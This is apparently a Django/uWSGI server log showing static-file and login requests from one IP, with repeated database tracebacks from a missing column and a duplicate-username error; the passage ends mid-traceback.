20296 bytes in 5 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 32185|app: -1|req: -1/11] 219.228.146.156 () {38 vars in 791 bytes} [Thu Jan 14 07:18:33 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/12] 219.228.146.156 () {38 vars in 809 bytes} [Thu Jan 14 07:18:33 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 32185|app: -1|req: -1/13] 219.228.146.156 () {38 vars in 807 bytes} [Thu Jan 14 07:18:33 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/14] 219.228.146.156 () {38 vars in 799 bytes} [Thu Jan 14 07:18:34 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 32185|app: -1|req: -1/15] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:18:36 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/16] 219.228.146.156 () {38 vars in 827 bytes} [Thu Jan 14 07:18:37 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 32185|app: 0|req: 5/17] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:18:49 2021] POST /login/ => generated 27 bytes in 32 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 6/18] 219.228.146.156 () {40 vars in 911 bytes} [Thu Jan 14 07:18:49 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 31, in home + for t in recommends: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") +[pid: 32185|app: 0|req: 7/19] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:18:50 2021] GET /home/ => generated 183111 bytes in 130 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 8/20] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:18:53 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") +[pid: 32185|app: 0|req: 9/21] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:06 2021] POST /login/ => generated 208125 bytes in 155 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") +[pid: 32185|app: 0|req: 10/22] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:10 2021] POST /login/ => generated 208125 bytes in 142 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 11/23] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:16 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 31, in home + for t in recommends: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") +[pid: 32185|app: 0|req: 12/24] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:19:16 2021] GET /home/ => generated 183111 bytes in 96 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 13/25] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:19:22 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 14/26] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 07:19:30 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 31, in home + for t in recommends: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") +[pid: 32185|app: 0|req: 15/27] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 07:19:30 2021] GET /home/ => generated 183111 bytes in 104 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 16/28] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:20:05 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 17/29] 219.228.146.156 () {40 vars in 917 bytes} [Thu Jan 14 07:20:08 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 18/30] 219.228.146.156 () {40 vars in 919 bytes} [Thu Jan 14 07:20:08 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 19/31] 219.228.146.156 () {48 vars in 1017 bytes} [Thu Jan 14 07:20:20 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 20/32] 219.228.146.156 () {40 vars in 925 bytes} [Thu Jan 14 07:20:20 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1) +Internal Server Error: /admin-home/ +Traceback (most recent call last): + File 